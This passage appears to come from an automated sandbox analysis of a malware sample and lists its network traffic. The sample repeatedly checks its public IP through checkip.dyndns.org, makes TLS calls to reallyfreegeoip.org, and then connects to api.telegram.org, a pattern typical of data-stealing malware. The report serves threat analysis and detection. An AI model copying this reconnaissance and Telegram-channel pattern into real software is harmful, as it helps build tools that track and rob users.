                                                                                  Sep 27, 2024 10:47:30.881700993 CEST49700443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:30.931173086 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:30.936080933 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.133038044 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.161760092 CEST49701443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:31.161828041 CEST44349701188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.161896944 CEST49701443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:31.162229061 CEST49701443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:31.162242889 CEST44349701188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.175031900 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:31.637057066 CEST44349701188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.639826059 CEST49701443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:31.639852047 CEST44349701188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.786241055 CEST44349701188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.786345959 CEST44349701188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.786427975 CEST49701443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:31.786958933 CEST49701443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:31.790143013 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:31.791419029 CEST4970280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:31.795178890 CEST8049699158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.795254946 CEST4969980192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:31.796174049 CEST8049702158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:31.796246052 CEST4970280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:31.796327114 CEST4970280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:31.801064014 CEST8049702158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.371851921 CEST8049702158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.373430014 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.373490095 CEST44349703188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.373590946 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.374156952 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.374170065 CEST44349703188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.424998999 CEST4970280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:32.828816891 CEST44349703188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.830460072 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.830507040 CEST44349703188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.974735022 CEST44349703188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.974839926 CEST44349703188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.975406885 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.975406885 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.986876965 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:32.991719961 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.991813898 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:32.991928101 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:32.996674061 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.550592899 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.572843075 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:33.572876930 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.572962999 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:33.573266983 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:33.573282003 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.596935034 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.026843071 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.028311014 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.028331041 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.175647020 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.175740957 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.175826073 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.176317930 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.180111885 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.181030989 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.185777903 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.185805082 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.185837984 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.185878992 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.186002016 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.190718889 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.808716059 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.810134888 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.810172081 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.810710907 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.810878992 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.810890913 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.862544060 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.264621973 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.266185999 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.266206980 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.396303892 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.396394014 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.396725893 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.398876905 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.400235891 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.402873039 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.405550957 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.405693054 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.407744884 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.408276081 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.408276081 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.413117886 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.977077961 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.980223894 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.980320930 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.980437994 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.980648994 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.980703115 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.018847942 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.462778091 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.464505911 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:36.464567900 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.605624914 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.605731964 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.605878115 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:36.606385946 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:36.610336065 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.611804962 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.615848064 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.615930080 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.616642952 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.616760015 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.616889000 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.621675968 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.193453074 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.194915056 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.194961071 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.195056915 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.195342064 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.195353985 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.237560034 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.651527882 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.653767109 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.653790951 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.809432983 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.809535980 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.809735060 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.813569069 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.817173004 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.818133116 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.822211981 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.822298050 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.822922945 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.822981119 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.823101044 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.827879906 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.380419970 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.381710052 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.381761074 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.381846905 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.382083893 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.382101059 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.425038099 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.848473072 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.850053072 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.850075006 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.978490114 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.978576899 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.978744030 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.979319096 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.982295036 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.983707905 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.987600088 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.987685919 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.988531113 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.988617897 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.988795996 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.993808031 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.775293112 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.776839972 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:39.776890039 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.776989937 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:39.777273893 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:39.777287006 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.787242889 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.787352085 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:40.241466045 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.243092060 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:40.243129015 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.382785082 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.382885933 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.382958889 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:40.383538961 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:40.408776045 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:40.414033890 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.414115906 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:40.417251110 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:40.417285919 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.417619944 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:40.417764902 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:40.417778969 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.044646025 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.044835091 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.048450947 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.048461914 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.048892021 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.050518990 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.091401100 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.347111940 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.347197056 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.347388029 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.366692066 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.799312115 CEST4970280192.168.2.7158.101.44.242

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Sep 27, 2024 10:47:29.275546074 CEST5370853192.168.2.71.1.1.1
                                                                                  Sep 27, 2024 10:47:29.283811092 CEST53537081.1.1.1192.168.2.7
                                                                                  Sep 27, 2024 10:47:30.127849102 CEST4972253192.168.2.71.1.1.1
                                                                                  Sep 27, 2024 10:47:30.136090040 CEST53497221.1.1.1192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.409476995 CEST5516953192.168.2.71.1.1.1
                                                                                  Sep 27, 2024 10:47:40.416456938 CEST53551691.1.1.1192.168.2.7

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Sep 27, 2024 10:47:29.275546074 CEST192.168.2.71.1.1.10xb14Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:30.127849102 CEST192.168.2.71.1.1.10x7dedStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:40.409476995 CEST192.168.2.71.1.1.10xb10dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Sep 27, 2024 10:47:29.283811092 CEST1.1.1.1192.168.2.70xb14No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:29.283811092 CEST1.1.1.1192.168.2.70xb14No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:29.283811092 CEST1.1.1.1192.168.2.70xb14No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:29.283811092 CEST1.1.1.1192.168.2.70xb14No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:29.283811092 CEST1.1.1.1192.168.2.70xb14No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:29.283811092 CEST1.1.1.1192.168.2.70xb14No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:30.136090040 CEST1.1.1.1192.168.2.70x7dedNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:30.136090040 CEST1.1.1.1192.168.2.70x7dedNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Sep 27, 2024 10:47:40.416456938 CEST1.1.1.1192.168.2.70xb10dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • reallyfreegeoip.org
                                                                                  • api.telegram.org
                                                                                  • checkip.dyndns.org

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.749699158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:29.294574976 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 27, 2024 10:47:29.910844088 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 6a9deef42de469b531c6dfe3d44a6b5d
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 27, 2024 10:47:29.915019035 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 27, 2024 10:47:30.066852093 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 8730ca0b1e733c87e5a505006018a6f7
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 27, 2024 10:47:30.931173086 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 27, 2024 10:47:31.133038044 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:31 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: fc91bcc42d7f35effdf1308bec7b934d
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.749702158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:31.796327114 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 27, 2024 10:47:32.371851921 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: d36db8745c10794edefc0a0a6e1b3f7e
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.749704158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:32.991928101 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 27, 2024 10:47:33.550592899 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:33 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 08577ac9fa9b2121996618eb1dd8dd5d
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.749706158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 27, 2024 10:47:34.186002016 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 27, 2024 10:47:34.808716059 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: c23ba3683a991ca425247fd9def26ff0
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.749708158.101.44.242806764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
